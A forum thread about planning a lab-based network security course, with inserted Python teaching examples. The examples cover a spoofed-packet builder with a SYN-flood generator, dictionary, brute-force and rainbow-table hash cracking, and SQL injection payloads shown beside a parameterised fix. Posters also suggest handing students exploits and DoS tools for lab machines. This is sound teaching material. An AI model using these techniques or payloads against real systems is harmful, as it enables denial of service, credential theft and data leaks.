
Thread: I need help to create a Network security course

  1. #11 (Junior Member, joined May 2005, 28 posts)
    Nmap scanning will be good for teaching about ports/services, network packets, TCP flags, etc.

    ARP poisoning, like I said, can teach about ARP, switched networks, packet sniffing, etc.

    DoS (SYN flood) could teach about the TCP connection queue and SYN cookies.

    IP spoofing can teach about the three-way handshake (ACK #'s, SYN #'s) and exploiting trust relationships.

    This is a solid start and all of these things can be tested in a lab. Nmap scan a test box, ARP poison two communicating machines and sniff, SYN flood some test box ON THE LOCAL NETWORK, IP spoof some box running one of the r* services, etc.
    An ancient chinese man once told me: \"The hotter the tea, the bigger the wang.\"

    My tea is extra hot.
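The four lab topics in the post above (TCP flags, the handshake's SEQ/ACK arithmetic, a spoofed source address, and a SYN flood against a server that does or does not use SYN cookies) in one runnable Python script. This is an added example, not the poster's code: it builds IPv4/TCP packets as bytes and never sends them, so it needs no root and no lab network. The `COOKIE_SECRET` value and the cookie layout are assumptions for illustration (a simplified scheme, not the Linux or BSD implementation).

```python
"""IPv4/TCP segments built by hand: flags, handshake seq/ack numbers, a spoofed
source address, and a toy SYN cookie. Stdlib only; nothing is put on the wire."""
import hashlib
import random
import socket
import struct

TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
COOKIE_SECRET = b"rotate-me"  # assumed server secret for the toy SYN cookie


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; computed over a valid header it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b"", ttl=64):
    """IPv4 header + 20-byte TCP header + payload. The source address is whatever
    the caller writes, which is all 'IP spoofing' means at this layer."""
    bits = sum(TCP_FLAGS[f] for f in flags)
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, bits, 65535, 0, 0)
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, socket.IPPROTO_TCP, len(tcp) + len(payload))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0x4000,
                     ttl, socket.IPPROTO_TCP, 0, src, dst)
    return ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:] + tcp + payload


def parse_packet(pkt: bytes) -> dict:
    """Decode both headers and verify both checksums, as a sniffer would."""
    vihl, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (vihl & 0x0F) * 4
    seg = pkt[ihl:total_len]
    sport, dport, seq, ack, off, bits, _, _, _ = struct.unpack("!HHIIBBHHH", seg[:20])
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, proto, len(seg))
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
            "sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": [n for n, b in TCP_FLAGS.items() if bits & b],
            "payload": seg[(off >> 4) * 4:],
            "ip_csum_ok": checksum(pkt[:ihl]) == 0,
            "tcp_csum_ok": checksum(pseudo + seg) == 0}


def handshake(client_ip, server_ip, cport, sport, client_isn, server_isn):
    """The three segments; each ACK number is the other side's SEQ plus one.
    A spoofed client never sees the SYN/ACK, so it would have to guess server_isn."""
    syn = build_packet(client_ip, server_ip, cport, sport, client_isn, 0, ["SYN"])
    synack = build_packet(server_ip, client_ip, sport, cport, server_isn, client_isn + 1, ["SYN", "ACK"])
    ack = build_packet(client_ip, server_ip, cport, sport, client_isn + 1, server_isn + 1, ["ACK"])
    return syn, synack, ack


def syn_flood(victim_ip, dport, count, seed=0):
    """SYNs from random spoofed sources: each one costs the victim a half-open
    queue entry while the SYN/ACK goes to an address that will never answer."""
    rng = random.Random(seed)
    pkts = []
    for _ in range(count):
        src = "%d.%d.%d.%d" % (rng.randrange(1, 224), rng.randrange(256), rng.randrange(256), rng.randrange(256))
        pkts.append(build_packet(src, victim_ip, rng.randrange(1024, 65536), dport, rng.getrandbits(32), 0, ["SYN"]))
    return pkts


def syn_cookie(src_ip, dst_ip, sport, dport, t):
    """Toy SYN cookie: the ISN carries an 8-bit time counter and a 24-bit keyed hash
    of the 4-tuple, so the server keeps no queue entry for the half-open connection
    (simplified layout, not the exact Linux/BSD one; MSS encoding omitted)."""
    t &= 0xFF
    msg = COOKIE_SECRET + ("%s|%s|%d|%d|%d" % (src_ip, dst_ip, sport, dport, t)).encode()
    return (t << 24) | int.from_bytes(hashlib.sha256(msg).digest()[:3], "big")


def check_cookie(src_ip, dst_ip, sport, dport, ack, now, window=3):
    """Validate the client's final ACK (ack = ISN + 1) with nothing stored server-side."""
    isn = (ack - 1) & 0xFFFFFFFF
    return any((now - age) & 0xFF == isn >> 24 and
               syn_cookie(src_ip, dst_ip, sport, dport, now - age) == isn
               for age in range(window))


if __name__ == "__main__":
    for p in handshake("10.0.0.5", "10.0.0.1", 40000, 80, 1000, 5000):
        d = parse_packet(p)
        print(d["src"], "->", d["dst"], d["flags"], "seq", d["seq"], "ack", d["ack"])
```

Run it to print the three handshake segments. To put packets on a real lab network you would write `build_packet()`'s output to a raw socket (`socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW`) as root, and a sniffer on the wire shows exactly the fields `parse_packet()` decodes. The cookie functions are the point of the SYN-flood lesson: with a cookie the server answers every SYN but stores nothing, so the flood fills no queue.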

  2. #12 (Senior Member, joined Jan 2003, 3,915 posts)
    Hey Hey,

    I think that a couple of things need to be decided upon before you start planning this course.

    1. What user level is this based at... You mention basic knowledge of Linux and TCP/IP.. but what does that really mean? Someone who's installed Linux once because they heard l33t hax0rs use it??? Or someone who's been using it and playing with it for 6 months - a year... TCP/IP... someone who sets up the occasional LAN for a LAN party... or someone who has completed their Network+, CCNA, Nortel NetKnowledge, etc. courses? This will play a major role... If these people are coming in with the barebones knowledge then you'll have to start a lot simpler.. but if you're focusing this course on CCNA holders that have played with Linux for a couple of years... the course can be a bit more advanced..

    2. How intense can a 40 hour course be... Are there tests? A final exam? Practical tests? My security course last semester ran 115 hours in the classroom.. and about equal hours outside the class on homework and studying... This semester is the same length... From the scheduled plans it sounds like a Continuing Education course... this means people who have been out of the classroom for a while and aren't used to learning... It also means people with lives who won't be able to do a lot of outside study... (or won't be committed to it)..

    3. This is two-part.... who is this course aimed at... and how much do you value your reputation as an IT employee.... If they want a "Computer Hacking" course... it sounds like they want to aim this at high school students and college students... It's lose/lose before you even start... They won't work unless you give them something that's really "Underground" and then they'll just goof off.. the class is a failure before you start it... If it's a Computer Security course... are you focusing on home user or corporate security... Are you focusing on IT members of the community or non-IT people... You mention a basic course.. but basic to which level of study.

    If you're looking for a "Computer Hacking" course... then I think you're on track with using knoppix-std (however, I'd recommend Auditor or Whoppix since they're usually kept more up-to-date)...

    However if you're looking for a Computer Security course... then it's a knowledge level thing...

    Don't be worrying about "hacking" and the actual exploitation... So it's lab-based.. this makes sense... most people learn better this way (that's why University students are tools in the real world)...

    If you take your initial layout.. 5 weeks.. 4 hours (sat and sun)... Then divide the course up.... even if it is lab based, you need theory... If it's really as basic as you're making it seem... I think using a live CD is useless...because getting into nmap, nessus, etc isn't the best way to start... You need to go to the bare bones basic level..

    Eg.

    Week 1
    Day 1
    Hour 1: Introduction (What is Computer Security and Why is it important)
    Hour 2: CIA -- This is the basis for all computer security... make them understand that..
    Hours 3 & 4: A very cool little lab that my security prof used last semester to introduce the basics... "Packet sniffing"

    Here's how it works..
    Divide the groups up into teams... we had 8 groups... 2 were Stock Brokers, 2 were banks, 2 were "Evil Hax0rs" and 2 were "Security Auditors"

    1 brokerage firm and 1 bank are in a partnership... so 4 groups per side

    Brokerage Firm ---- Hax0rs ---- Auditors ---- Bank

    Give the brokerage firm and the bank information.. say the bank gets the $ amounts in a group of people's accounts... and the brokerage firm the $ amounts that people want to buy/sell... Give them names, but not the other person's information... and then restrictions.. like they can only sell if they have $X in their bank account...

    Give the brokerage firm and the bank a few minutes to meet and discuss an "encryption scheme", something simple that they can agree on... My group picked Rot13 but other groups just used stuff they made up... Then they have to transfer packets.. but they have to fill in the src, destination, message, etc. on each packet (piece of paper)... They pass it to the group closest to them (Hax0rs or Auditors) who pass it to the opposite group and then to the receiving end... They have to successfully create all the trades in X amount of time... sending one packet at a time... and if they forget anything from the "packet" then the hax0rs or auditors can "drop it" and they only get like 10-15 seconds with the packet before they have to pass it.. so they have to be quick about copying the information and following the "stream"

    I can give you more details by PM if you're at all interested.... it was a great learning experience for most of the class..

    Day 2:
    Hour 1: Cover yesterday's "packet sniffing lab".. Ask hackers and auditors how they kept up... What methods they used.
    Hour 2: Explain real packet sniffing.. through a hub and through a switch...
    Hour 3: Lab using Ethereal... compare what they see to what they did..
    Hour 4: (if Ethereal doesn't chew this up)... Ettercap and use a switch.


    Week 2:
    Day 1:
    Hour 1: Continue with your "packet sniffing lab". This time the encryption.. Ask questions about how they decided what to do.
    Hour 2: Cover Encryption -- Basics (AES-256, DES, 3DES, IDEA, etc)
    Hours 3 and 4: Encryption Lab: I recommend Invisible Secrets Trial version for Windows... but you could use other software..

    Day 2:
    Hour 1: Last day to use your "packet sniffing lab"... This time do TCP flags and give a brief explanation..
    Hour 2: Use Ethereal again (reaffirm this knowledge because it's important) and this time focus on the flags... Find out how the groups guaranteed their transmission.. or if they did in the lab..
    Hours 3-4: Break away from the lab completely and let them have some fun... Cover password policies, etc. for like 30 minutes and then give them an hour and a half lab on passwords... use a Windows machine to create a series of users and passwords (based on ones they supply...)... Dump the SAM file (demo how to do this) and distribute it to the students... set them to cracking the files using John the Ripper, LC5 (trial) or maybe ophcrack. Make sure you cover brute force, dictionary and rainbow tables.

    Week 3:

    Day 1 ("Hax0ring day", halfway through.. time for fun):
    Hour 1: Cover the importance of patching a system and applications...
    Hour 2: Distribute copies of exploits such as the dcom or rpc exploits and have them do a lab exploiting unpatched machines to demonstrate the downfall.. Again have them sniff to see exactly what's happening
    Hour 3: Cover denial of service (include prevention... aka firewall or whatever)
    Hour 4: Distribute some DoS or DDoS tools and let them play with it (again make them sniff)

    Day 2(Practical Test):
    Hour 1: Review (in a short course, you need to do this)
    Hours 2-3: Create a 2 hour test that covers everything you've covered so far.. (maybe a simple war game... set up the room on hubs or switches or a little of both.. set up your PC as a webserver, and also vulnerable to some sort of exploit, transfer a file from your PC to another and in it have the name of an exploit that it's vulnerable to... and a password for the website on the server, in separate files).... See how many of them can sniff the data (using the correct tool)... determine your machine's address and then access the website and upload (using a simple PHP upload script that you have running) the source code for the proper exploit (named <their name>.c)
    Hour 4: Let them run a little late if needed and then wrap up by covering the lab and which parts they found difficult.

    Week 4:
    Time for some port scanning..

    Day 1:

    Hour 1: Cover TCP Ports (Common Ports, Well Known Ports, Ephemeral Ports) and the basics of a TCP Connect scan and a Syn scan
    Hour 2: Pull out nmap and setup some machines for them to scan... have a few different devices so they can see OS detection.. maybe a router or managed switch, a windows machine and a linux machine
    Hours 3 & 4: Change the pace and cover physical security... show a scene out of a movie (such as T2) that's got a short section that demos plenty of physical security. The lab can be identifying the types of physical security in place.. and then explain and cover them.

    Day 2:

    Hour 1: Explain Security Auditing
    Hour 2: Run a short intro to nessus...
    Hour 3-4: Setup another mini wargame.. have them run a nessus scan against a vulnerable machine (something that nessus will find)... give them a list of online exploit repositories.. and let them find the correct exploit

    Week 5:

    Day 1:
    Hour 1: Cover protection more in depth... file system security, firewalls (hardware and software), IDS
    Hour 2: Walk them through writing some iptables/ipchains rules (use their newly gained TCP/IP knowledge to help them and to reaffirm it)
    Hour 3: Set up an IDS (Snort perhaps) with them
    Hour 4: Have them generate some traffic and sniff it.. compare the Ethereal/Ettercap results with the Snort messages and watch the difference between traffic with the firewall down and the firewall up.

    Day 2:
    Hour 1: Finish up your analysis from last week
    Hour 2 (have some more fun): teach them the basics of MySQL and PHP and cover some basic injection
    Hour 3-4: bring up wireless... maybe demo wepcrack
    Final: Wrap everything up.. leave them with some resources to continue their learning (AO, WebGoat, Hacme Bank, SecurityForest, SecurityFocus, Secunia, PacketStorm, Shmoo, K-Otik (FrSIRT), milw0rm, etc)

    Anyways.. It's 4:30 AM and apparently I just spent an hour typing that.. but that's how I'd design it... I think if my first security course had been structured more like that, a lot of the students would have come out a little better off (then again.. some learned a lot)

    Take what ya want and burn the rest :P

    Peace,
    HT
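The Week 2 password lab in the post above (brute force, dictionary and rainbow tables against a dumped hash file), as an added Python example that is not the poster's material. SHA-1 over a three-letter lowercase keyspace stands in for the LM/NTLM hashes of a real SAM dump so it runs in seconds with no third-party tools, and the `user:hexhash` line format read by `crack_dump()` is a constructed simplification of pwdump output.

```python
"""Three ways to attack an unsalted password hash dump: dictionary, brute force,
and a rainbow table. SHA-1 over a three-letter keyspace stands in for the LM/NTLM
hashes a real SAM dump contains (toy keyspace is an assumption for speed)."""
import hashlib
import itertools
import random
import string

ALPHABET = string.ascii_lowercase
LENGTH = 3                           # 26**3 = 17,576 possible passwords
SPACE = len(ALPHABET) ** LENGTH


def H(password: str) -> bytes:
    return hashlib.sha1(password.encode()).digest()


def dictionary_attack(target: bytes, wordlist):
    """Cheapest attack, but it only finds words that are on the list."""
    return next((w for w in wordlist if H(w) == target), None)


def brute_force(target: bytes, max_len=LENGTH):
    """Exhaustive search; the |alphabet|**length cost is paid again for every hash."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(ALPHABET, repeat=n):
            word = "".join(combo)
            if H(word) == target:
                return word
    return None


def reduce_fn(digest: bytes, position: int) -> str:
    """Map a hash back into the keyspace. Mixing in the column position gives each
    column its own reduction, which is what makes this a rainbow table rather than
    a plain Hellman table and keeps merged chains from swallowing each other."""
    n = (int.from_bytes(digest[:8], "big") + position) % SPACE
    out = []
    for _ in range(LENGTH):
        n, r = divmod(n, len(ALPHABET))
        out.append(ALPHABET[r])
    return "".join(out)


def build_table(chains=400, chain_len=30, seed=1):
    """Precomputation: hash/reduce chains, storing only (end -> start) for each."""
    rng = random.Random(seed)
    table = {}
    for _ in range(chains):
        start = word = "".join(rng.choice(ALPHABET) for _ in range(LENGTH))
        for pos in range(chain_len):
            word = reduce_fn(H(word), pos)
        table.setdefault(word, start)    # first chain wins when endpoints collide
    return table, chain_len


def rainbow_lookup(target: bytes, table, chain_len):
    """Online phase: guess the column the hash sits in, walk to the chain end, then
    regenerate that chain from its start. A false alarm (end matches but the
    password is not in that chain) simply falls through to the next column."""
    for i in range(chain_len - 1, -1, -1):
        word = reduce_fn(target, i)
        for pos in range(i + 1, chain_len):
            word = reduce_fn(H(word), pos)
        start = table.get(word)
        if start is None:
            continue
        word = start
        for pos in range(chain_len):
            if H(word) == target:
                return word
            word = reduce_fn(H(word), pos)
    return None


def crack_dump(lines, wordlist, table, chain_len):
    """Crack 'user:hexhash' lines (a constructed format, simpler than pwdump's):
    wordlist first, then the table. None means neither attack hit."""
    found = {}
    for line in lines:
        user, hexhash = line.strip().split(":")
        target = bytes.fromhex(hexhash)
        found[user] = dictionary_attack(target, wordlist) or rainbow_lookup(target, table, chain_len)
    return found


if __name__ == "__main__":
    table, L = build_table()
    dump = ["alice:" + H("cat").hex(),                        # constructed sample dump
            "bob:" + H(next(iter(table.values()))).hex(),
            "eve:" + H("Z9!").hex()]                          # outside the keyspace
    print(crack_dump(dump, ["dog", "cat"], table, L))
```

Two things worth pointing out in class: the table stores 400 pairs for 12,000 hash computations, so storage shrinks at the cost of the chain-walking done at lookup time, and nothing here works once the hashes are salted, because a salt makes one precomputed table useless for every other user.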

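The Week 5 "basics of MySQL and PHP and some basic injection" hour, as an added example that is not from the post, in Python with in-memory SQLite standing in for MySQL: the string-built login query beside its parameterised fix, and the three payloads a student would try against it. The table and the two accounts are constructed sample data.

```python
"""A login check with string-built SQL next to its parameterised fix.
In-memory SQLite stands in for a MySQL/PHP stack; the data is constructed."""
import sqlite3


def make_db():
    """Sample users; passwords are stored in clear only to keep the demo short."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, name, password):
    """The user's input is pasted into the SQL text, so quotes and comment
    markers in it change the structure of the query itself."""
    sql = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(db, name, password):
    """Bound parameters: the input travels as data and is never parsed as SQL."""
    row = db.execute("SELECT name FROM users WHERE name = ? AND password = ?",
                     (name, password)).fetchone()
    return row[0] if row else None


# Classic payloads typed into the login form (constructed inputs).
BYPASS = ("admin' --", "anything")                  # comment out the password check
TAUTOLOGY = ("' OR '1'='1", "' OR '1'='1")          # WHERE clause is always true
UNION = ("x' UNION SELECT password FROM users WHERE name = 'admin' --", "x")  # read another column


if __name__ == "__main__":
    db = make_db()
    for label, (u, p) in (("bypass", BYPASS), ("tautology", TAUTOLOGY), ("union", UNION)):
        print(label, "vulnerable:", login_vulnerable(db, u, p), "fixed:", login_fixed(db, u, p))
```

The UNION payload is the one to dwell on: the login returns whatever the selected column holds, so a query meant to return a username leaks the admin password instead. On MySQL the `--` comment needs a trailing space (`-- `) or `#` can be used; SQLite accepts a bare `--`, which is why the payloads end that way here.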